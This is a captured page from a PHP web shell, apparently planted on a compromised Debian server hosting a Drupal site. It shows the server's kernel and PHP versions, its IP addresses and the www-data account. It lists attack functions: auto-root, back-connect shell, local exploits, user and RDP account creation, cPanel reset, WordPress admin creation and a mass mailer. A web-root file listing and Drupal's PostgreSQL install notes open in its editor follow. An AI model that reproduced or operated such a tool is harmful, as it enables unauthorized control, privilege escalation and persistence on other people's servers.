Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.149.242.223
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
[ HOME SHELL ]
Name
Size
Permission
Action
includes
[ DIR ]
drwxr-xr-x
misc
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
profiles
[ DIR ]
drwxr-xr-x
scripts
[ DIR ]
drwxr-xr-x
sites
[ DIR ]
drwxr-xr-x
themes
[ DIR ]
drwxr-xr-x
.htaccess
5.66
KB
-rw-r--r--
BLlogo4-mini-margin.png
8.53
KB
-rw-r--r--
BLlogo4-mini.png
8.53
KB
-rw-r--r--
CHANGELOG.txt
96.21
KB
-rw-r--r--
COPYRIGHT.txt
1.45
KB
-rw-r--r--
INSTALL.mysql.txt
1.68
KB
-rw-r--r--
INSTALL.pgsql.txt
1.83
KB
-rw-r--r--
INSTALL.sqlite.txt
1.27
KB
-rw-r--r--
INSTALL.txt
17.57
KB
-rw-r--r--
LICENSE.txt
17.67
KB
-rw-r--r--
MAINTAINERS.txt
7.98
KB
-rw-r--r--
README.txt
5.26
KB
-rw-r--r--
UPGRADE.txt
9.42
KB
-rw-r--r--
authorize.php
6.45
KB
-rw-r--r--
cron.php
720
B
-rw-r--r--
index.php
529
B
-rw-r--r--
install.php
703
B
-rw-r--r--
phpinfo.php
25
B
-rw-r--r--
robots.txt
1.44
KB
-rw-r--r--
update.php
19.52
KB
-rw-r--r--
web.config
2.13
KB
-rw-r--r--
xmlrpc.php
417
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : INSTALL.pgsql.txt
CREATE THE PostgreSQL DATABASE ------------------------------ Note that the database must be created with UTF-8 (Unicode) encoding. 1. CREATE DATABASE USER This step is only necessary if you don't already have a user set up (e.g., by your host), or want to create a new user for use with Drupal only. The following command creates a new user named 'username' and asks for a password for that user: createuser --pwprompt --encrypted --no-createrole --no-createdb username If there are no errors, then the command was successful. 2. CREATE DRUPAL DATABASE This step is only necessary if you don't already have a database set up (e.g., by your host) or want to create a new database for use with Drupal only. The following command creates a new database named 'databasename', which is owned by the previously created 'username': createdb --encoding=UTF8 --owner=username databasename If there are no errors, then the command was successful. 3. CREATE SCHEMA OR SCHEMAS (Optional advanced step) Drupal will run across different schemas within your database if you so wish. By default, Drupal runs inside the 'public' schema but you can use $db_prefix inside settings.php to define a schema for Drupal to run inside of, or specify tables that are shared inside of a separate schema. Drupal will not create schemas for you. In fact, the user that Drupal runs as should not be allowed to do this. You'll need to execute the SQL below as a superuser, replace 'username' with the username that Drupal uses to connect to PostgreSQL, and replace 'schema_name' with a schema name you wish to use, such as 'shared': CREATE SCHEMA schema_name AUTHORIZATION username; Do this for as many schemas as you need. See default.settings.php for instructions on how to set which tables use which schemas.
Close